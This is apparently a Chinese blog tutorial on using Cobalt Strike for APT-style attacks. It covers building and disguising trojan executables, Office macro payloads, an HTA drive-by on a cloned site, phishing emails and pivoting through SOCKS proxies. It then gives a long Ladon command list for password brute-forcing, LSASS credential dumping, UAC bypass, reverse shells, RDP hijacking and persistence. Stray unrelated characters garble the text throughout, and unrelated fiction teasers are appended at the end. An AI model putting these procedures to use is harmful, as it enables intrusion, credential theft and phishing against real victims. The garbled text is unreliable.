14.社會工程學(xué)和apt

apt可使用工具Cobalt Strike朗徊,cs主要用于內(nèi)網(wǎng)滲透以及APT攻擊尊勿。

1. cs使用

服務(wù)器端:kali(192.168.60.)
客戶端:windows(192.168.60.17)

1.啟動服務(wù)器端:
在安裝目錄下使用命令 ./teamserver ip 123456(密碼)


image.png

2.連接客戶端:


image.png

1.1 主機(jī)上線

1.選擇監(jiān)聽器伤塌,創(chuàng)建payload


image.png
image.png

2.生成木馬
選擇攻擊---生成木馬---windows Executa... ,選擇剛才設(shè)置的監(jiān)聽器见芹。


image.png

3.將生成的exe文件放在靶機(jī)上。
可以使用軟件安防文件捆綁器對兩個exe文件進(jìn)行捆綁和改變圖標(biāo)。

image.png

使用KilerRat可以將exe文件改變?yōu)槠渌缶Y名的文件罕邀。


image.png

3.在靶機(jī)運行之后就可以在客戶端查看并進(jìn)行操作。


image.png

1.2 結(jié)合metesploit养距,反彈shell

使用cs3.14版本诉探,客戶端是cobaltstrike.bat
1.在kali中輸入mafconsole,進(jìn)入msf.并進(jìn)行設(shè)置


image.png

2.在靶機(jī)中
使用Cobalt Strike創(chuàng)建一個windows/foreign/reverse_http的Listener。其中ip為Metasploit的ip地址棍厌,端口為Metasploit所監(jiān)聽的端口肾胯。

image.png

3.選擇增加會話,之后就可以在kali上看到的會話信息耘纱。


image.png

建立會話:


image.png

1.3 office宏payload應(yīng)用

1.在win7上安裝office 2003,然后再cs客戶端生成木馬敬肚,并選擇監(jiān)聽器。
選擇攻擊--生成后門--ms office...--選擇監(jiān)聽器束析。并將生成的文件復(fù)制到靶機(jī)中艳馒。


image.png

2.打開office軟件,把cs生成的代碼放到word宏里员寇。
一般是word默認(rèn)禁用所有宏(在工具----宏--安全性--選擇低)
弄慰,另外應(yīng)用位置不要設(shè)置所有的活動模板和文檔,建設(shè)應(yīng)用在當(dāng)前文檔蝶锋。

創(chuàng)建宏:


image.png
image.png

3.運行文檔時可在cs客戶端查看到新的會話陆爽。


image.png

1.4 https payload的應(yīng)用

可以免查殺,做到開機(jī)自啟動扳缕。

1.5 信息收集

網(wǎng)站短鏈接生成:https://tool.chinaz.com/tools/dwz.aspx
1.選擇攻擊---釣魚攻擊---信息收集

image.png

2.填寫信息之后點擊開始慌闭,將生成的url進(jìn)行復(fù)制


image.png

3.打開短連接生成地址,將剛才復(fù)制的url進(jìn)行短鏈接生成第献。

4.將生成的短鏈接進(jìn)行訪問贡必,可在視圖--應(yīng)用信息,查看到訪問的url信息庸毫。


image.png

可用于驗證ssrf,csrf漏洞是否真實存在衫樊,通過查看點擊鏈接之后在cs客戶端查看應(yīng)用信息飒赃,是否進(jìn)行頁面跳轉(zhuǎn)。

1.6 hta網(wǎng)頁掛馬

1.先生成hta文件科侈,選擇攻擊---生成后門---html Application....選擇監(jiān)聽器载佳,將method改為powershell。選擇保存臀栈。


image.png

2.使用文件下載蔫慧。并進(jìn)行設(shè)置。


image.png

image.png

點擊開始之后权薯,evil.hta文件會自動上傳到cs目錄下的uploads文件夾下姑躲。
image.png

3.克隆網(wǎng)站睡扬,并進(jìn)行設(shè)置。
攻擊---釣魚攻擊--克隆網(wǎng)站黍析。


image.png

http://192.168.60.67:1245/evil.hta

4.把生成的鏈接復(fù)制出來到瀏覽器卖怜。


image.png

下載文件運行之后,可以在web日志看到剛才輸入的數(shù)據(jù)阐枣。


image.png

1.7 郵件釣魚

1.點擊攻擊--郵件釣魚马靠,將下面內(nèi)容填寫完整。
mail server:填寫的是發(fā)件人的賬號蔼两,smtp授權(quán)碼甩鳄,端口等信息。

image.png

郵件內(nèi)容是由郵箱中下載進(jìn)行修改而來的额划。


image.png

在郵箱中開啟smtp服務(wù)妙啃。


image.png
image.png

image.png

3.可以在收件箱看到剛才發(fā)送的郵件。


image.png

1.8 Socks代理應(yīng)用(橫向滲透)

本次實驗需要三臺虛擬機(jī)锁孟,kali(cs服務(wù)器端)彬祖,2007(60網(wǎng)段/0網(wǎng)段 ip192.168.0.2)、2010(0網(wǎng)段(192.168.0.3)品抽,是被控制的機(jī)器储笑,作為跳板攻擊內(nèi)網(wǎng))
1.給2007系統(tǒng)添加一個網(wǎng)卡,并設(shè)置lan網(wǎng)段圆恤。


image.png

并設(shè)置第二張網(wǎng)卡IP是192.168.0.2
設(shè)置win10系統(tǒng)ip為192.168.0.3

2.設(shè)置cs客戶端突倍。設(shè)置代理端口。端口號為25172


image.png

2.查看已搭建的代理盆昙。并點擊Tunnel 將點擊之后生成的代碼復(fù)制到msf中運行羽历。這樣就可以利用msf遠(yuǎn)程攻擊192.168.0.3所在的主機(jī)。


image.png

3.利用msf模塊直接攻擊


image.png

1.8.2 設(shè)置kali的軟件socks代理

1.可以開啟socks4a代理淡喜,通過代理進(jìn)行內(nèi)網(wǎng)滲透
開啟socks秕磷,可以通過命令,也可以通過右鍵Pivoting->SOCKS Server

beacon> socks 端口號
[+] started SOCKS4a server on: 2222
[+] host called home, sent: 16 bytes
然后vim /etc/proxychains.conf 炼团,在文件末尾添加socks4代理服務(wù)器澎嚣。
socks4 127.0.0.1 端口號
例子:
使用proxychains代理掃描內(nèi)網(wǎng)主機(jī) proxychains nmap -sP 192.168.183.0/24。
在使用的插件前都加上proxychains瘟芝。

image.png

2.也可以在連接的主機(jī)上通過
設(shè)置 中轉(zhuǎn)---Deploy vpn設(shè)置虛擬網(wǎng)卡就行內(nèi)網(wǎng)滲透易桃。

image.png

1.9 cs提權(quán)和內(nèi)網(wǎng)滲透

需要在guthub上下載插件:
https://github.com/rsmudge/Elevatekit
https://github.com/k8gege/Aggressor
landon用法:http://k8gege.org/Ladon/

##### 001 多協(xié)議探測存活主機(jī) (IP、機(jī)器名锌俱、MAC地址晤郑、制造商)

Ladon 192.168.1.8/24 OnlinePC

##### 002 多協(xié)議識別操作系統(tǒng) (IP、機(jī)器名、操作系統(tǒng)版本造寝、開放服務(wù))

Ladon 192.168.1.8/24 OsScan

##### 003 掃描存活主機(jī)

Ladon 192.168.1.8/24 OnlineIP

##### 004 ICMP掃描存活主機(jī)

Ladon 192.168.1.8/24 Ping

##### 005 掃描SMB漏洞MS17010 (IP磕洪、機(jī)器名、漏洞編號匹舞、操作系統(tǒng)版本)

Ladon 192.168.1.8/24 MS17010

##### 006 SMBGhost漏洞檢測 CVE-2020-0796 (IP褐鸥、機(jī)器名、漏洞編號赐稽、操作系統(tǒng)版本)

Ladon 192.168.1.8/24 SMBGhost

##### []007 掃描Web信息/Http服務(wù)

Ladon 192.168.1.8/24 WebScan

##### []008 掃描C段站點URL域名

Ladon 192.168.1.8/24 UrlScan

##### 009 掃描C段站點URL域名

Ladon 192.168.1.8/24 SameWeb

##### 010 掃描子域名叫榕、二級域名

Ladon baidu.com SubDomain

##### 011 域名解析IP、主機(jī)名解析IP

Ladon baidu.com DomainIP Ladon baidu.com HostIP

#####012 域內(nèi)機(jī)器信息獲取

Ladon AdiDnsDump 192.168.1.8 (Domain IP)

##### 013 掃描C段端口姊舵、指定端口掃描

Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389

##### 014 掃描C段WEB以及CMS(75種Web指紋識別)

Ladon 192.168.1.8/24 WhatCMS

##### 015 掃描思科設(shè)備

Ladon 192.168.1.8/24 CiscoScan Ladon [http://192.168.1.8](http://192.168.1.8/) CiscoScan

##### [016 枚舉Mssql數(shù)據(jù)庫主機(jī) (數(shù)據(jù)庫IP晰绎、機(jī)器名、SQL版本)

Ladon EnumMssql

##### 017 枚舉網(wǎng)絡(luò)共享資源 (域括丁、存活I(lǐng)P荞下、共享路徑)

Ladon EnumShare

##### 018 掃描LDAP服務(wù)器

Ladon 192.168.1.8/24 LdapScan

##### 019 掃描FTP服務(wù)器

Ladon 192.168.1.8/24 FtpScan

###暴力破解/網(wǎng)絡(luò)認(rèn)證/弱口令/密碼爆破/數(shù)據(jù)庫/網(wǎng)站后臺/登陸口/系統(tǒng)登陸

密碼爆破詳解參考SSH:[http://k8gege.org/Ladon/sshscan.html](http://k8gege.org/Ladon/sshscan.html)

#####020 445端口 SMB密碼爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

#####021 135端口 Wmi密碼爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

##### 022 389端口 LDAP服務(wù)器、AD域密碼爆破(Windows)

Ladon 192.168.1.8/24 LdapScan

##### 023 5985端口 Winrm密碼爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan.ini

##### 024 445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan

##### 025 135端口 Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan

##### 026 22端口 SSH密碼爆破(Linux)

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

##### 027 1433端口 Mssql數(shù)據(jù)庫密碼爆破

Ladon 192.168.1.8/24 MssqlScan

##### 028 1521端口 Oracle數(shù)據(jù)庫密碼爆破

Ladon 192.168.1.8/24 OracleScan

##### 029 3306端口 Mysql數(shù)據(jù)庫密碼爆破

Ladon 192.168.1.8/24 MysqlScan

##### 030 7001端口 Weblogic后臺密碼爆破

Ladon [http://192.168.1.8:7001/console](http://192.168.1.8:7001/console) WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

##### [031 5900端口 VNC遠(yuǎn)程桌面密碼爆破

Ladon 192.168.1.8/24 VncScan

##### 032 21端口 Ftp服務(wù)器密碼爆破

Ladon 192.168.1.8/24 FtpScan

#####033 8080端口 Tomcat后臺登陸密碼爆破

Ladon 192.168.1.8/24 TomcatScan Ladon [http://192.168.1.8:8080/manage](http://192.168.1.8:8080/manage) TomcatScan

##### 034 Web端口 401基礎(chǔ)認(rèn)證密碼爆破

Ladon [http://192.168.1.8/login](http://192.168.1.8/login) HttpBasicScan

##### 035 445端口 Impacket SMB密碼爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini

##### 036 445端口 IPC密碼爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini

### []漏洞檢測/漏洞利用/Poc/Exp

##### [](https://github.com/k8gege/Aggressor#037-smb%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8Bcve-2017-0143cve-2017-0144)037 SMB漏洞檢測(CVE-2017-0143/CVE-2017-0144)

Ladon 192.168.1.8/24 MS17010

#####038 Weblogic漏洞檢測(CVE-2019-2725/CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc

#####039 PhpStudy后門檢測(phpstudy 2016/phpstudy 2018)

Ladon 192.168.1.8/24 PhpStudyPoc

##### 040 ActiveMQ漏洞檢測(CVE-2016-3088)

Ladon 192.168.1.8/24 ActivemqPoc

#####041 Tomcat漏洞檢測(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatPoc

##### 042 Weblogic漏洞利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp

##### 043 Tomcat漏洞利用(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatExp

##### 044 Struts2漏洞檢測(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

Ladon 192.168.1.8/24 Struts2Poc

### FTP下載史飞、HTTP下載

##### 045 HTTP下載

Ladon HttpDownLoad [http://k8gege.org/Download/Ladon.rar](http://k8gege.org/Download/Ladon.rar)

##### 046 Ftp下載

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

### 加密解密(HEX/Base64)

##### 047 Hex加密解密

Ladon 123456 EnHex Ladon 313233343536 DeHex

##### [](https://github.com/k8gege/Aggressor#048-base64%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86)048 Base64加密解密

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64

### 網(wǎng)絡(luò)嗅探

##### 049 Ftp密碼嗅探

Ladon FtpSniffer 192.168.1.5

##### 050 HTTP密碼嗅探

Ladon HTTPSniffer 192.168.1.5

##### 051 網(wǎng)絡(luò)嗅探

Ladon Sniffer

###密碼讀取

##### 052 讀取IIS站點密碼尖昏、網(wǎng)站路徑

Ladon IISpwd

##### DumpLsass內(nèi)存密碼

Ladon DumpLsass

### 信息收集

#####053 進(jìn)程詳細(xì)信息

Ladon EnumProcess Ladon Tasklist

#####054 獲取命令行參數(shù)

Ladon cmdline Ladon cmdline cmd.exe

#####055 獲取滲透基礎(chǔ)信息

Ladon GetInfo Ladon GetInfo2

##### 056 .NET & PowerShell版本

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

##### 057 運行時版本&編譯環(huán)境

Ladon Ver Ladon Version

### 遠(yuǎn)程執(zhí)行(psexec/wmiexec/atexec/sshexec)

#####445端口 PSEXEC遠(yuǎn)程執(zhí)行命令(交互式)

net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system

##### 058 135端口 WmiExec遠(yuǎn)程執(zhí)行命令 (非交互式)

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

##### 059 445端口 AtExec遠(yuǎn)程執(zhí)行命令(非交互式)

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

#####060 22端口 SshExec遠(yuǎn)程執(zhí)行命令(非交互式)

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

##### 061 JspShell遠(yuǎn)程執(zhí)行命令(非交互式)

Usage:Ladon JspShell type url pwd cmd Example: Ladon JspShell ua [http://192.168.1.8/shell.jsp](http://192.168.1.8/shell.jsp) Ladon whoami

#### 062 WebShell遠(yuǎn)程執(zhí)行命令(非交互式)

source-shell
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami


### 提權(quán)降權(quán)

##### 063 BypassUac 繞過UAC執(zhí)行,支持Win7-Win10

Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat

##### 064 GetSystem 提權(quán)或降權(quán)運行程序

Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer

##### 065 Runas 模擬用戶執(zhí)行命令

Ladon Runas user pass cmd

### 其它功能

#####066 一鍵啟用.net 3.5

Ladon EnableDotNet

##### 067 獲取內(nèi)網(wǎng)站點HTML源碼

Ladon gethtml [http://192.168.1.1](http://192.168.1.1/)

#####068 檢測后門

Ladon CheckDoor Ladon AutoRun

##### 069 獲取本機(jī)內(nèi)網(wǎng)IP與外網(wǎng)IP

Ladon GetIP

##### 070 一鍵迷你WEB服務(wù)器

Ladon WebSer 80 Ladon web 80

### []反彈Shell

##### 071 反彈TCP NC Shell

Ladon ReverseTcp 192.168.1.8 4444 nc

##### 072 反彈TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

##### 073 反彈TCP MSF MET Shell

Ladon ReverseTcp 192.168.1.8 4444 meter

##### 074 反彈HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444

#####075 反彈HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444

##### 076 反彈TCP CMD & PowerShell Shell

Ladon PowerCat -r 192.168.1.8 4444 cmd Ladon PowerCat -r 192.168.1.8 4444 psh

##### 077 反彈UDP Cmd & PowerShell Shell

Ladon PowerCat -r 192.168.1.110 4444 cmd -u Ladon PowerCat -r 192.168.1.8 4444 psh -u

##### 078 RDP桌面會話劫持(無需密碼)

Ladon RDPHijack 3 Ladon RDPHijack 3 console

##### 079 OXID定位多網(wǎng)卡主機(jī)

Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan

#### 080 查看用戶最近訪問文件

Ladon Recent

#### 081 添加注冊表Run啟動項

Ladon RegAuto Test c:\123.exe

####082 AT計劃執(zhí)行程序(無需時間)(system權(quán)限)

Ladon at c:\123.exe Ladon at c:\123.exe gui

#### 083 SC服務(wù)加啟動項&執(zhí)行程序(system權(quán)限)

Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName

1.安裝插件,選擇腳本管理器---load.


image.png

加載之后再選擇提權(quán)构资,重新選擇exploit抽诉。就可以進(jìn)行提權(quán)。

image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末吐绵,一起剝皮案震驚了整個濱河市迹淌,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌己单,老刑警劉巖唉窃,帶你破解...
    沈念sama閱讀 211,639評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異纹笼,居然都是意外死亡纹份,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,277評論 3 385
  • 文/潘曉璐 我一進(jìn)店門廷痘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來矮嫉,“玉大人,你說我怎么就攤上這事牍疏。” “怎么了拨齐?”我有些...
    開封第一講書人閱讀 157,221評論 0 348
  • 文/不壞的土叔 我叫張陵鳞陨,是天一觀的道長。 經(jīng)常有香客問我,道長厦滤,這世上最難降的妖魔是什么援岩? 我笑而不...
    開封第一講書人閱讀 56,474評論 1 283
  • 正文 為了忘掉前任,我火速辦了婚禮掏导,結(jié)果婚禮上享怀,老公的妹妹穿的比我還像新娘。我一直安慰自己趟咆,他們只是感情好添瓷,可當(dāng)我...
    茶點故事閱讀 65,570評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著值纱,像睡著了一般鳞贷。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上虐唠,一...
    開封第一講書人閱讀 49,816評論 1 290
  • 那天搀愧,我揣著相機(jī)與錄音,去河邊找鬼疆偿。 笑死咱筛,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的杆故。 我是一名探鬼主播迅箩,決...
    沈念sama閱讀 38,957評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼反番!你這毒婦竟也來了沙热?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,718評論 0 266
  • 序言:老撾萬榮一對情侶失蹤罢缸,失蹤者是張志新(化名)和其女友劉穎篙贸,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體枫疆,經(jīng)...
    沈念sama閱讀 44,176評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡爵川,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,511評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了息楔。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片寝贡。...
    茶點故事閱讀 38,646評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖值依,靈堂內(nèi)的尸體忽然破棺而出圃泡,到底是詐尸還是另有隱情,我是刑警寧澤愿险,帶...
    沈念sama閱讀 34,322評論 4 330
  • 正文 年R本政府宣布颇蜡,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏风秤。R本人自食惡果不足惜鳖目,卻給世界環(huán)境...
    茶點故事閱讀 39,934評論 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望缤弦。 院中可真熱鬧领迈,春花似錦、人聲如沸碍沐。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,755評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽抢韭。三九已至薪贫,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間刻恭,已是汗流浹背瞧省。 一陣腳步聲響...
    開封第一講書人閱讀 31,987評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留鳍贾,地道東北人鞍匾。 一個月前我還...
    沈念sama閱讀 46,358評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像骑科,于是被迫代替她去往敵國和親橡淑。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,514評論 2 348